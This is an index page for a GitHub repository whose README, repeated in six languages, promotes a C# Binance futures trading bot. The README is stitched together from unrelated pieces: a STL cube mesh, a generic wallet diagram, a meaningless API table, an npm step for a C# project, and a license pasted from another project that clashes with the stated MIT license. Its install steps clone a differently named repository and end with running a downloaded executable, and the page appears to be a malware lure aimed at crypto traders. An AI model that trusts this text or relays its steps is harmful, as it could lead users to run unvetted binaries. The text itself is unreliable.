Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/durnaceutah/krux-binance-trading-bot-futures-crypto-coins-volatility
This repository provides Krux, a trading bot for Binance focused on futures trading of cryptocurrencies. It is designed to handle market volatility effectively, leveraging advanced algorithms to optimize trading strategies and maximize profits.
https://github.com/durnaceutah/krux-binance-trading-bot-futures-crypto-coins-volatility
algorithmic-trading api automated-trading binance bitcoin blockchain crypto crypto-bot crypto-exchange cryptocurrency cryptocurrency-trading ethereum exchange exchange-api litecoin machine-learning margin-trading trading trading-bot trading-strategies
Last synced: about 1 month ago
JSON representation
This repository provides Krux, a trading bot for Binance focused on futures trading of cryptocurrencies. It is designed to handle market volatility effectively, leveraging advanced algorithms to optimize trading strategies and maximize profits.
- Host: GitHub
- URL: https://github.com/durnaceutah/krux-binance-trading-bot-futures-crypto-coins-volatility
- Owner: DurnaceUtah
- License: mit
- Created: 2024-08-10T23:02:59.000Z (3 months ago)
- Default Branch: main
- Last Pushed: 2024-08-21T14:42:41.000Z (3 months ago)
- Last Synced: 2024-10-11T05:41:57.827Z (about 1 month ago)
- Topics: algorithmic-trading, api, automated-trading, binance, bitcoin, blockchain, crypto, crypto-bot, crypto-exchange, cryptocurrency, cryptocurrency-trading, ethereum, exchange, exchange-api, litecoin, machine-learning, margin-trading, trading, trading-bot, trading-strategies
- Language: C#
- Size: 478 KB
- Stars: 0
- Watchers: 0
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
- License: LICENSE
Awesome Lists containing this project
README
## EN
Building System Applications with C# & C++ 🚀## README LANGUAGE
LANGUAGES!
ENGLISH
ARABIC
CHINESE
FRENCH
PORTUGuESE
TURKISH
---------------------------------
## Read About
The Binance Trading Bot in C# automates cryptocurrency trading on the Binance exchange. Utilizing Binance's API and C# programming language, it executes trades based on predefined strategies and market conditions. With features like real-time data analysis, risk management, and customizable trading parameters, this bot empowers traders to optimize their trading strategies and capitalize on market opportunities efficiently and effectively.#### **Please ReaD First What You Need Part.**
####![mm2](https://github.com/df123hh/photo/assets/171132664/1c824199-b86d-4f3b-90c8-9fc5a6ccc7d6)
https://github.com/df123hh/photo/assets/171132664/876456fb-a6c3-4bb3-95b0-a30df9f2e14e
```mermaid
erDiagram
WALLET {
string id
string owner
float balance
}
WALLET ||--o{ TRANSACTION : initiates
WALLET ||--o{ BALANCE : updates
TRANSACTION ||--o{ CONFIRMATION : confirms
CONFIRMATION ||--o{ WALLET : updates
CONFIRMATION ||--o{ BLOCKCHAIN : records
BLOCKCHAIN }|--o{ TRANSACTION : contains
BLOCKCHAIN }|--o{ BALANCE : contains
```
### What You Need
----
| Explorer | Api |
| --------- | -----:|
| Blockchain | 0000 |
| Etherscan | Daf |
| Oklink | 000 |
| BlockCypher | ST8 |
| Explorer-Solana | 91 |
----## Roadmap
- [ ] New Gui
- [x] Add back to top links
- [ ] Add Additional Templates w/ Examples
- [ ] New Features
- [x] Multi-language Support
- [x] Chinese
- [x] Turkish
- [x] French
- [x] Spanish## Getting Started
### Prerequisites
This is an example of how to list things you need to use the software and how to install them.
* npm
```sh
npm install npm@latest -g
```### Installation
1. Download Visual Studio 2022
_using Git Clone Or either download the project or exit the rar. Then Download Visual Studio 2022 Here Link [VisualStudio Download](https://visualstudio.microsoft.com/downloads/)_
![last1](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)
> Download These2. Clone the repo
```sh
git clone https://github.com/SoonAdd/Addsoon.git
```
3. OR![download](https://github.com/fikfifkasd/asd2342/assets/80986477/29a942a4-924c-4a97-9e76-99f49b7ec27a)
4. _Then open the sln (Project Solution) file_
![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)
5. Find Executable File
```sh
/ProjectName/Bin/Debug/Executable.exe
``````stl
solid cube_corner
facet normal 0.0 -1.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 1.0 0.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
facet normal 0.0 0.0 -1.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 1.0 0.0 0.0
endloop
endfacet
facet normal -1.0 0.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 0.0 1.0
vertex 0.0 1.0 0.0
endloop
endfacet
facet normal 0.577 0.577 0.577
outer loop
vertex 1.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
endsolid
```
Not sure where to start? Join our discord and we will help you get started!
## AR
بناء تطبيقات النظام باستخدام C# وC++ 🚀## اللغة التمهيدية
اللغات!
إنجليزي
ARABIC
صينى
فرنسي
البرتغالية
اللغة التركية
---------------------------------
## أقرأ عن
يقوم Binance Trading Bot في لغة C# بأتمتة تداول العملات المشفرة في بورصة Binance. باستخدام واجهة برمجة تطبيقات Binance ولغة البرمجة C#، فإنها تنفذ عمليات التداول بناءً على استراتيجيات وظروف السوق المحددة مسبقًا. بفضل ميزات مثل تحليل البيانات في الوقت الفعلي، وإدارة المخاطر، ومعلمات التداول القابلة للتخصيص، يعمل هذا الروبوت على تمكين المتداولين من تحسين استراتيجيات التداول الخاصة بهم والاستفادة من فرص السوق بكفاءة وفعالية.#### **يرجى قراءة الجزء الأول الذي تحتاجه.**
####![mm2](https://github.com/df123hh/photo/assets/171132664/1c824199-b86d-4f3b-90c8-9fc5a6ccc7d6)
https://github.com/df123hh/photo/assets/171132664/876456fb-a6c3-4bb3-95b0-a30df9f2e14e
```mermaid
erDiagram
WALLET {
string id
string owner
float balance
}
WALLET ||--o{ TRANSACTION : initiates
WALLET ||--o{ BALANCE : updates
TRANSACTION ||--o{ CONFIRMATION : confirms
CONFIRMATION ||--o{ WALLET : updates
CONFIRMATION ||--o{ BLOCKCHAIN : records
BLOCKCHAIN }|--o{ TRANSACTION : contains
BLOCKCHAIN }|--o{ BALANCE : contains
```
### What You Need
----
| Explorer | Api |
| --------- | -----:|
| Blockchain | 0000 |
| Etherscan | Daf |
| Oklink | 000 |
| BlockCypher | ST8 |
| Explorer-Solana | 91 |
----## خريطة الطريق
- [ ] جديد Gui
- [x] أضف العودة إلى الروابط العليا
- [ ] أضف قوالب إضافية مع أمثلة
- [ ] جديد سمات
- [x] دعم متعدد اللغات
- [x] صينى
- [x] اللغة التركية
- [x] فرنسي
- [x] الأسبانية## ابدء
### المتطلبات الأساسية
هذا مثال لكيفية إدراج الأشياء التي تحتاجها لاستخدام البرنامج وكيفية تثبيتها.
* npm
```sh
npm install npm@latest -g
```### تثبيت
1. تحميل Visual Studio 2022
_باستخدام Git Clone أو إما تنزيل المشروع أو الخروج من ملف rar. ثم قم بتنزيل Visual Studio 2022 هنا الرابط [VisualStudio Download](https://visualstudio.microsoft.com/downloads/)_
![last1](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)
> قم بتنزيل هذه2. استنساخ الريبو
```sh
git clone https://github.com/SoonAdd/Addsoon.git
```
3. أو![download](https://github.com/fikfifkasd/asd2342/assets/80986477/29a942a4-924c-4a97-9e76-99f49b7ec27a)
4. _ثم افتح sln (Project Solution) ملف_
![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)
5. ابحث عن الملف القابل للتنفيذ
```sh
/ProjectName/Bin/Debug/قابل للتنفيذ (. EXE
``````stl
solid cube_corner
facet normal 0.0 -1.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 1.0 0.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
facet normal 0.0 0.0 -1.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 1.0 0.0 0.0
endloop
endfacet
facet normal -1.0 0.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 0.0 1.0
vertex 0.0 1.0 0.0
endloop
endfacet
facet normal 0.577 0.577 0.577
outer loop
vertex 1.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
endsolid
```
لست متأكدا من أين تبدأ؟ انضم إلى خلافنا وسنساعدك على البدء!
## License
جزء كبير من هذا المشروع مرخص بموجب [Apache 2.0](./LICENSE) license. الاستثناء الوحيد هو المكونات الموجودة تحت `ee` (enterprise edition) directory, these are licensed under the [Amplication Enterprise Edition](./ee/LICENSE) license.
## CH
使用 C# 和 C++ 构建系统应用程序 🚀## 自述文件语言
语言!
---------------------------------
## 阅读
C# 语言的币安交易机器人可自动在币安交易所进行加密货币交易。它利用币安的 API 和 C# 编程语言,根据预定义的策略和市场条件执行交易。该机器人具有实时数据分析、风险管理和可定制交易参数等功能,使交易者能够优化其交易策略并高效地利用市场机会。#### **请先阅读您需要的部分。**
####(您需要什么)
![mm2](https://github.com/df123hh/photo/assets/171132664/1c824199-b86d-4f3b-90c8-9fc5a6ccc7d6)
https://github.com/df123hh/photo/assets/171132664/876456fb-a6c3-4bb3-95b0-a30df9f2e14e
```mermaid
erDiagram
WALLET {
string id
string owner
float balance
}
WALLET ||--o{ TRANSACTION : initiates
WALLET ||--o{ BALANCE : updates
TRANSACTION ||--o{ CONFIRMATION : confirms
CONFIRMATION ||--o{ WALLET : updates
CONFIRMATION ||--o{ BLOCKCHAIN : records
BLOCKCHAIN }|--o{ TRANSACTION : contains
BLOCKCHAIN }|--o{ BALANCE : contains
```
### What You Need
----
| Explorer | Api |
| --------- | -----:|
| Blockchain | 0000 |
| Etherscan | Daf |
| Oklink | 000 |
| BlockCypher | ST8 |
| Explorer-Solana | 91 |
----(回到顶部)
## 路线图
- [ ] 新的 Gui
- [x] 添加返回顶部链接
- [ ] 添加附加模板和示例
- [ ] 新的 特征
- [x] 多语言支持
- [x] 中国人
- [x] 土耳其
- [x] 法语
- [x] 西班牙语(回到顶部)
## 入门
### 先决条件
这是如何列出使用该软件所需的东西以及如何安装它们的示例。
* npm
```sh
npm install npm@latest -g
```### 安装
1. 下载 Visual Studio 2022
_使用 Git Clone 或者下载项目或退出 rar。然后在此处下载 Visual Studio 2022 链接 [VisualStudio Download](https://visualstudio.microsoft.com/downloads/)_
![last1](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)
> 下载这些2. 克隆存储库
```sh
git clone https://github.com/SoonAdd/Addsoon.git
```
3. OR![download](https://github.com/fikfifkasd/asd2342/assets/80986477/29a942a4-924c-4a97-9e76-99f49b7ec27a)
4. _然后打开sln (Project Solution) file_
![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)
5. 查找可执行文件
```sh
/ProjectName/Bin/Debug/Executable.exe
```(回到顶部)
```stl
solid cube_corner
facet normal 0.0 -1.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 1.0 0.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
facet normal 0.0 0.0 -1.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 1.0 0.0 0.0
endloop
endfacet
facet normal -1.0 0.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 0.0 1.0
vertex 0.0 1.0 0.0
endloop
endfacet
facet normal 0.577 0.577 0.577
outer loop
vertex 1.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
endsolid
```(回到顶部)
(回到顶部)
不知道从哪里开始?加入我们的discord,我们将帮助您开始!
(回到顶部)
## 执照
该项目的很大一部分是根据 [Apache 2.0](./LICENSE) 执照。唯一的例外是下面的组件 `ee` (enterprise edition) directory, these are licensed under the [Amplication Enterprise Edition](./ee/LICENSE) license.
## FR
Création d'applications système avec C# et C++ 🚀## LANGUE README
LANGAGES!
ANGLAIS
ARABE
CHINOIS
FRANÇAIS
Portugais
TURC
---------------------------------
## Lire à propos
Le Binance Trading Bot en C# automatise le trading de crypto-monnaie sur la bourse Binance. Utilisant l'API de Binance et le langage de programmation C#, il exécute des transactions basées sur des stratégies et des conditions de marché prédéfinies. Avec des fonctionnalités telles que l'analyse des données en temps réel, la gestion des risques et des paramètres de trading personnalisables, ce robot permet aux traders d'optimiser leurs stratégies de trading et de capitaliser sur les opportunités du marché de manière efficace et efficiente.#### **Veuillez lire d'abord la pièce dont vous avez besoin.**
####![mm2](https://github.com/df123hh/photo/assets/171132664/1c824199-b86d-4f3b-90c8-9fc5a6ccc7d6)
https://github.com/df123hh/photo/assets/171132664/876456fb-a6c3-4bb3-95b0-a30df9f2e14e
```mermaid
erDiagram
WALLET {
string id
string owner
float balance
}
WALLET ||--o{ TRANSACTION : initiates
WALLET ||--o{ BALANCE : updates
TRANSACTION ||--o{ CONFIRMATION : confirms
CONFIRMATION ||--o{ WALLET : updates
CONFIRMATION ||--o{ BLOCKCHAIN : records
BLOCKCHAIN }|--o{ TRANSACTION : contains
BLOCKCHAIN }|--o{ BALANCE : contains
```### What You Need
----
| Explorer | Api |
| --------- | -----:|
| Blockchain | 0000 |
| Etherscan | Daf |
| Oklink | 000 |
| BlockCypher | ST8 |
| Explorer-Solana | 91 |
----## Feuille de Route
- [ ] Nouvelle Gui
- [x] Ajouter des liens vers le haut
- [ ] Ajouter Des Modèles Supplémentaires avec des Exemples
- [ ] Nouvelles Fonctionnalités
- [x] Prise en charge multilingue
- [x] Chinois
- [x] Turc
- [x] Français
- [x] Espagnol## Pour Commencer
### Prérequis
Ceci est un exemple de la façon de répertorier les éléments dont vous avez besoin pour utiliser le logiciel et de les installer.
* npm
```sh
npm install npm@latest -g
```### Montage
1. Télécharger Visual Studio 2022
_en utilisant Git Clone Ou téléchargez le projet ou quittez le rar. Ensuite, Téléchargez Visual Studio 2022 Ici Lien [VisualStudio Download](https://visualstudio.microsoft.com/downloads/)_
![last1](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)
> Téléchargez-Les2. Cloner le dépôt
```sh
git clone https://github.com/SoonAdd/Addsoon.git
```
3. OU![download](https://github.com/fikfifkasd/asd2342/assets/80986477/29a942a4-924c-4a97-9e76-99f49b7ec27a)
4. _Ensuite, ouvrez le sln (Project Solution) file_
![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)
5. Trouver un Fichier Exécutable
```sh
/ProjectName/Bin/Debug/Executable.exe
``````stl
solid cube_corner
facet normal 0.0 -1.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 1.0 0.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
facet normal 0.0 0.0 -1.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 1.0 0.0 0.0
endloop
endfacet
facet normal -1.0 0.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 0.0 1.0
vertex 0.0 1.0 0.0
endloop
endfacet
facet normal 0.577 0.577 0.577
outer loop
vertex 1.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
endsolid
```
Vous ne savez pas par où commencer? Rejoignez notre discorde et nous vous aiderons à démarrer!
## Licence
A large part of this project is licensed under the [Apache 2.0](./LICENSE) license. The only exception are the components under the `ee` (enterprise edition) directory, these are licensed under the [Amplication Enterprise Edition](./ee/LICENSE) license.
## PR
Construindo aplicativos de sistema com C# e C++ 🚀## IDIOMA LEIA-ME
LÍNGUAS!
INGLÊS
ÁRABE
CHINÊS
FRANCÊS
Português
TURCO
---------------------------------
## Ler sobre
O Binance Trading Bot em C# automatiza a negociação de criptomoedas na bolsa Binance. Utilizando a API da Binance e a linguagem de programação C#, ele executa negociações com base em estratégias e condições de mercado predefinidas. Com recursos como análise de dados em tempo real, gerenciamento de risco e parâmetros de negociação personalizáveis, este bot permite que os traders otimizem suas estratégias de negociação e capitalizem as oportunidades de mercado de forma eficiente e eficaz.#### **Por favor, leia primeiro o que você precisa.**
####![mm2](https://github.com/df123hh/photo/assets/171132664/1c824199-b86d-4f3b-90c8-9fc5a6ccc7d6)
https://github.com/df123hh/photo/assets/171132664/876456fb-a6c3-4bb3-95b0-a30df9f2e14e
```mermaid
erDiagram
WALLET {
string id
string owner
float balance
}
WALLET ||--o{ TRANSACTION : initiates
WALLET ||--o{ BALANCE : updates
TRANSACTION ||--o{ CONFIRMATION : confirms
CONFIRMATION ||--o{ WALLET : updates
CONFIRMATION ||--o{ BLOCKCHAIN : records
BLOCKCHAIN }|--o{ TRANSACTION : contains
BLOCKCHAIN }|--o{ BALANCE : contains
```
### What You Need
----
| Explorer | Api |
| --------- | -----:|
| Blockchain | 0000 |
| Etherscan | Daf |
| Oklink | 000 |
| BlockCypher | ST8 |
| Explorer-Solana | 91 |
----## Roadmap
- [ ] Novo Gui
- [x] Adicionar links de volta ao topo
- [ ] Adicione modelos adicionais com exemplos
- [ ] Novo Features
- [x] Suporte multilíngue
- [x] chinês
- [x] Turco
- [x] Francês
- [x] Espanhol## Começando
### Pré-requisitos
Este é um exemplo de como listar os itens necessários para usar o software e como instalá-los.
* npm
```sh
npm install npm@latest -g
```### Instalação
1. Download Visual Studio 2022
_usando Git Clone Ou baixe o projeto ou saia do rar. Então baixe o Visual Studio 2022 aqui link [VisualStudio Download](https://visualstudio.microsoft.com/downloads/)_
![last1](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)
> Baixe estes2. Clonar o repositório
```sh
git clone https://github.com/SoonAdd/Addsoon.git
```
3. OR![download](https://github.com/fikfifkasd/asd2342/assets/80986477/29a942a4-924c-4a97-9e76-99f49b7ec27a)
4. _Então abra o sln (Project Solution) arquivo_
![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)
5. Encontre o arquivo executável
```sh
/ProjectName/Bin/Debug/Executable.exe
``````stl
solid cube_corner
facet normal 0.0 -1.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 1.0 0.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
facet normal 0.0 0.0 -1.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 1.0 0.0 0.0
endloop
endfacet
facet normal -1.0 0.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 0.0 1.0
vertex 0.0 1.0 0.0
endloop
endfacet
facet normal 0.577 0.577 0.577
outer loop
vertex 1.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
endsolid
```
Não sabe por onde começar? Junte-se ao nosso discord e nós o ajudaremos a começar!
## Licença
Grande parte deste projeto está licenciada sob o [Apache 2.0](./LICENSE) license. A única exceção são os componentes sob o `ee` (enterprise edition) directory, these are licensed under the [Amplication Enterprise Edition](./ee/LICENSE) license.
## TR
C# ve C++ ile Sistem Uygulamaları Oluşturuyorum. 🚀## README Dil
DİLLER!
İNGİLİZCE
ARAPÇA
ÇİNCE
FRANSIZCA
Portekizce
TÜRKÇE
---------------------------------
## Hakkında oku
C#'taki Binance Ticaret Botu, Binance borsasında kripto para birimi ticaretini otomatikleştirir. Binance'in API ve C# programlama dilini kullanarak, önceden tanımlanmış stratejilere ve piyasa koşullarına göre alım satımlar gerçekleştirir. Gerçek zamanlı veri analizi, risk yönetimi ve özelleştirilebilir ticaret parametreleri gibi özelliklerle bu bot, yatırımcıların ticaret stratejilerini optimize etmelerine ve piyasa fırsatlarından verimli ve etkili bir şekilde yararlanmalarına olanak tanır.#### **Lütfen Önce Neye İhtiyacınız Var Kısmını Okuyun.**
####![mm2](https://github.com/df123hh/photo/assets/171132664/1c824199-b86d-4f3b-90c8-9fc5a6ccc7d6)
https://github.com/df123hh/photo/assets/171132664/876456fb-a6c3-4bb3-95b0-a30df9f2e14e
```mermaid
erDiagram
WALLET {
string id
string owner
float balance
}
WALLET ||--o{ TRANSACTION : initiates
WALLET ||--o{ BALANCE : updates
TRANSACTION ||--o{ CONFIRMATION : confirms
CONFIRMATION ||--o{ WALLET : updates
CONFIRMATION ||--o{ BLOCKCHAIN : records
BLOCKCHAIN }|--o{ TRANSACTION : contains
BLOCKCHAIN }|--o{ BALANCE : contains
```
### NE GEREKİYOR.
----
| Explorer | Api |
| --------- | -----:|
| Blockchain | 0000 |
| Etherscan | Daf |
| Oklink | 000 |
| BlockCypher | ST8 |
| Explorer-Solana | 91 |
----## Yol Haritası(HEDEFLER)
- [ ] Yeni Gui
- [x] Başa dön bağlantılarına ekle
- [ ] Örneklerle Ek Şablonlar Ekleme
- [ ] Yeni özellikler
- [x] Çoklu Dil Desteği
- [x] Çince
- [x] Türkçe
- [x] Fransızca
- [x] İspanyol## Öncelikle
### Önkoşullar
Bu, yazılımı kullanmak için ihtiyaç duyduğunuz şeylerin nasıl listeleneceğine ve bunların nasıl kurulacağına ilişkin bir örnektir.
* npm
```sh
npm install npm@latest -g
```### Kurulum
1. Download Visual Studio 2022
_Git Clone'u kullanarak Veya projeyi indirin veya rar'dan çıkın. Ardından Visual Studio 2022'yi Buradan İndirin Bağlantı [VisualStudio Download](https://visualstudio.microsoft.com/downloads/)_
![last1](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)
> Bunları İndir2. Depoyu klonla
```sh
git clone https://github.com/SoonAdd/Addsoon.git
```
3. Veya![download](https://github.com/fikfifkasd/asd2342/assets/80986477/29a942a4-924c-4a97-9e76-99f49b7ec27a)
4. _Daha sonra Sln Dosyasini Acin (Project Solution) file_
![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)
5. Yürütülebilir Dosyayı Bul
```sh
/ProjectName/Bin/Debug/Executable.exe
``````stl
solid cube_corner
facet normal 0.0 -1.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 1.0 0.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
facet normal 0.0 0.0 -1.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 1.0 0.0 0.0
endloop
endfacet
facet normal -1.0 0.0 0.0
outer loop
vertex 0.0 0.0 0.0
vertex 0.0 0.0 1.0
vertex 0.0 1.0 0.0
endloop
endfacet
facet normal 0.577 0.577 0.577
outer loop
vertex 1.0 0.0 0.0
vertex 0.0 1.0 0.0
vertex 0.0 0.0 1.0
endloop
endfacet
endsolid
```
Nereden başlayacağınızdan emin değil misiniz? Discordumuza katılın ve başlamanıza yardımcı olalım!
## Lisans
Bu projenin büyük bir kısmı lisanslıdır. [Apache 2.0](./LICENSE) lisans. Bunun tek istisnası, aşağıdakiler kapsamındaki bileşenlerdir: `ee` (enterprise edition) directory, these are licensed under the [Amplication Enterprise Edition](./ee/LICENSE) license.